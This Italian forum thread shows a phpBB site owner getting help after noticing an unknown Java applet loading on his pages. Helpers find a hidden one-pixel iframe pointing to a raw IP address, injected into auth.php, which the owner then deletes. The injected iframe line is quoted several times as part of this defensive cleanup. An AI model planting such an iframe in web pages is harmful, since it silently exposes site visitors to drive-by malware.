barattomusicale

Praticamente quando apro la home o la home del forum ho notato nella barra di stato in basso a sinistra il caricamento di una applet Java da un indirizzo sconosciuto!
Cosa può essere successo? Ho aperto un ticket per il supporto ma oggi naturalmente essendo domenica non c'è nessuno al lavoro!

gh3

ciao, ho dato una breve occhiata per quel che si può fare guardando il codice.

allora a prima vista c'è una cosa che non torna, c'è infatti un codice a piè della pagina:

[HTML]<iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>[/HTML]

Cerando informazioni in merito si trova:

http://www.pcalsicuro.com/main/2007/04/roberto-vecchioni-vittima-della-vulnerabilita-ani

http://www.siteadvisor.com/sites/58.65.239.180/postid/?p=349225

Consiglio quindi un attenta analisi dei sorgenti del proprio sito alla ricerca del codice malware.

barattomusicale

@gh3 said:

ciao, ho dato una breve occhiata per quel che si può fare guardando il codice.

allora a prima vista c'è una cosa che non torna, c'è infatti un codice a piè della pagina:

[html]<iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>[/html]

Cerando informazioni in merito si trova:

http://www.pcalsicuro.com/main/2007/04/roberto-vecchioni-vittima-della-vulnerabilita-ani

http://www.siteadvisor.com/sites/58.65.239.180/postid/?p=349225

Consiglio quindi un attenta analisi dei sorgenti del proprio sito alla ricerca del codice malware.

Mamma mia! Non sò che fare! Metto subito il sito offline!

gh3

se hai accesso ftp, controllerei i file relativi all' header ( che è la parte alta del forum ) sia per quanto riguarda lo script che per quanto concerne il template.

barattomusicale

@gh3 said:

se hai accesso ftp, controllerei i file relativi all' header ( che è la parte alta del forum ) sia per quanto riguarda lo script che per quanto concerne il template.

Grazie per l'aiuto! Ho aperto i file dove mi dava gli errori cioè :
page_header.php session.php e auth.php, per i primi due sembra tutto ok
in auth.php c'era questo :

<iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>

L'ho cancellato e ora sembra tutto ok! Ora mi guardo tutti i file del sito!
Grazie Mille per l'aiuto!!!!!!!!! Veramente, grazie mille!

gh3

dovere

gh3

ti consiglierei comunque di valutare un aggiornamento del phpBB e mettere un controllo captcha aggiuntiva sulle iscrizioni o degli script antibot, non vorrei che fossero loro che facciano sql injection...

barattomusicale

@gh3 said:

ti consiglierei comunque di valutare un aggiornamento del phpBB e mettere un controllo captcha aggiuntiva sulle iscrizioni o degli script antibot, non vorrei che fossero loro che facciano sql injection...

Grazie dei consigli anche se sono seriamente intenzionato a passare a Vbulletin anche se a pagamento...

gh3

domanda, per caso usi qualche sistema di statistiche gratuito?
perchè sentivo che potrebbe essere insita in quello la causa.

barattomusicale

@gh3 said:

domanda, per caso usi qualche sistema di statistiche gratuito?
perchè sentivo che potrebbe essere insita in quello la causa.

NO uso solo google analytics per il sito di annunci, per il forum niente.

gh3

sfatato allora l'opzione stats, grazie della dritta

autodafe

hai uno spammer come ultimo utente registrato..toglilo "NicoloBueanta"

barattomusicale

@autodafe said:

hai uno spammer come ultimo utente registrato..toglilo "NicoloBueanta"

Grazie della segnalazione! L'ho eliminato.